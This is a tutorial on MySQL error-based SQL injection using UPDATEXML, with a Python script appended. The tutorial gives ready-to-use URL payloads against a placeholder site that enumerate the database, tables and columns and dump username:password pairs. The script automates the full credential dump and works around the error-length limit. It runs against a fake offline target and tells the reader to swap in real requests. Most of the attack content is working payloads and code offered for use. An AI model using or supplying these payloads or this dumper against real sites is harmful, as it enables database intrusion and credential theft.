Aerosol

Error Based Injection using UpdateXML


Credits to: Diku

The UpdateXML function in MySQL runs an XPath query against a string containing XML data and replaces the matched fragment. In MySQL it takes exactly three arguments:

UPDATEXML(xml_target, xpath_expr, new_xml)

(The four-argument form with a namespace string belongs to Oracle, not MySQL.) If the XPath expression is syntactically incorrect, MySQL aborts with an error that echoes the offending expression back to us:

XPATH syntax error: 'xpathqueryhere'

We use it under the same conditions as the other error-based injections; it is mainly useful when ExtractValue is not available or is filtered by the firewall. When the union-based attempt (the usual first step) gives no output, we can try error-based injection instead. For example, we used the query below and got no output.

www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5--+

Note the double quote: it closes the string, which means this time we are injecting into a string-type query rather than a numeric one. From that we can make a good guess at the internal query.

Query:

select path from pages where view="<our_input_here>" limit 1,1;

So let us continue our injection using UpdateXML. The 0x3a is a colon: a colon cannot start an XPath expression, so the parser fails at the very first character and the error message echoes the whole concatenated string, including the result of our subquery. The + after -- becomes a space in the URL, which MySQL requires after -- for it to start a comment.

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)--+

Getting the Current Database :

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select database())),null)--+

Output : XPATH syntax error: ‘:database_name_here’

As we got the database name, let us continue.

Getting tables in current Database:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

Output : XPATH syntax error: ‘:table_name_here’

As you can see, I used LIMIT, because the error message only shows 32 characters (31 after the leading colon), so long data gets cut off and we cannot pull many rows in one go. A single value longer than 31 characters can be read in pieces with substring(), e.g. substring((select ...),1,31), then substring((select ...),32,31), and so on. So I prefer to go one by one, increasing the row offset, to get the output. If you want to dump the whole database, go for a tool or a manual proxy, or write your own script to dump the data for you, which I find to be the best option.

So now let us assume we got the following tables using the above query:

  • Posts
  • Assets
  • Banner
  • Links
  • Users

Let us continue and try to get the columns:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)--+

Output : XPATH syntax error: ‘:column_name_here’

Let us say we got these 3 columns:

  • id
  • username
  • password

Let us dump the data from them, but before that let us count the number of rows.

Counting the number of rows in the users table:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username) from users)),null)--+

You can use the same trick to count the tables or columns (count(*) over information_schema.tables or information_schema.columns with the same where clause as above). So now let us continue dumping the data, one row per request, increasing the LIMIT offset each time:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select concat(username,0x3a,password) from users limit 0,1)),null)--+

Output : XPATH syntax error: ‘:Output_here’
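Here is the "write your own script" option from above, as an added example; it is not the author's code and nothing like it appears in the original post. It scripts the whole procedure (database, tables, columns, rows) and also covers the 32-character limit of the error message by reading each value in substring() slices of 31 characters and reassembling them. Everything target-related is an assumption made for illustration: the string-context injection point from the page, an application that echoes the MySQL error text verbatim, and the fake_target() function, which is a constructed stand-in for the vulnerable site (with made-up data) so the script runs offline. Replace fake_target with a function that sends the payload to the real target and returns the response body.

```python
"""Error-based extraction via UpdateXML, scripted (added example, not the
post's own code). Assumptions, all hypothetical: the string-context injection
point shown on the page, an application that echoes MySQL's error text, and
MySQL's 32-character cap on that text. fake_target() stands in for the site."""
import re

MAX_ERR = 32            # characters MySQL keeps from the bad XPath expression
CHUNK = MAX_ERR - 1     # minus one for the leading ':' marker (0x3a)
ERROR_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def build_payload(inner):
    """':' cannot start an XPath expression, so parsing fails at character 0
    and the error echoes the whole concat() result, subquery output included."""
    return f'-35" and updatexml(1,concat(0x3a,({inner})),1)--+'


def parse_error(body):
    """Text after the ':' marker; '' for an empty value; None if no error fired."""
    m = ERROR_RE.search(body)
    return None if m is None else m.group(1)[1:]


def extract(send, expr):
    """Read a scalar of any length by paging through substring() slices.
    send(payload) -> response body is the transport, injected so it can be faked."""
    value, pos = '', 1
    while True:
        piece = parse_error(send(build_payload(
            f'select substring(({expr}),{pos},{CHUNK})')))
        if piece is None:           # NULL row -> concat() is NULL -> no XPath error
            return None if pos == 1 else value
        value += piece
        if len(piece) < CHUNK:      # short slice means the value is exhausted
            return value
        pos += CHUNK


def enumerate_rows(send, query):
    """Walk 'limit n,1' row by row until the subquery returns NULL."""
    rows = []
    while (row := extract(send, f'{query} limit {len(rows)},1')) is not None:
        rows.append(row)
    return rows


def dump(send):
    """The post's procedure end to end: database, tables, columns, then rows."""
    return {
        'database': extract(send, 'select database()'),
        'tables': enumerate_rows(send, 'select table_name from information_schema.tables'
                                       ' where table_schema=database()'),
        'columns': enumerate_rows(send, 'select column_name from information_schema.columns'
                                        " where table_schema=database() and table_name='users'"),
        'rows': enumerate_rows(send, 'select concat(username,0x3a,password) from users'),
    }


# --- constructed stand-in for the vulnerable site, so this runs offline ---
FAKE_RESULTS = {   # inner subquery -> the rows it would return on the imaginary target
    'select database()': ['vulnweb_db'],
    'select table_name from information_schema.tables where table_schema=database()':
        ['posts', 'assets', 'banner', 'links', 'users'],
    "select column_name from information_schema.columns where table_schema=database()"
    " and table_name='users'": ['id', 'username', 'password'],
    'select concat(username,0x3a,password) from users': [
        'admin:9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08',  # 70 chars: needs 3 slices
        'editor:s3cret'],
}
INNER_RE = re.compile(r'select substring\(\((.*)\),(\d+),(\d+)\)')
LIMIT_RE = re.compile(r' limit (\d+),1$')


def fake_target(payload):
    """Emulates MySQL: run the subquery against FAKE_RESULTS, apply limit and
    substring, then fail like the real server with the error cut to MAX_ERR chars."""
    m = INNER_RE.search(payload)
    inner, pos, length = m.group(1), int(m.group(2)), int(m.group(3))
    row, lm = 0, LIMIT_RE.search(inner)
    if lm:
        row, inner = int(lm.group(1)), inner[:lm.start()]
    rows = FAKE_RESULTS.get(inner, [])
    if row >= len(rows):
        return '<html>page rendered normally: subquery gave NULL, no error</html>'
    value = rows[row][pos - 1:pos - 1 + length]
    return f"XPATH syntax error: '{(':' + value)[:MAX_ERR]}'"


if __name__ == '__main__':
    for name, data in dump(fake_target).items():
        print(name, data)
```

Two details worth noting. The end-of-rows condition is that the subquery returns NULL: concat(0x3a, NULL) is NULL, UpdateXML gets a NULL XPath and raises no error, so the page renders normally and the script stops. And the slice size is 31, not 32, because the colon marker that forces the XPath error takes one of the 32 characters MySQL keeps in the message.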
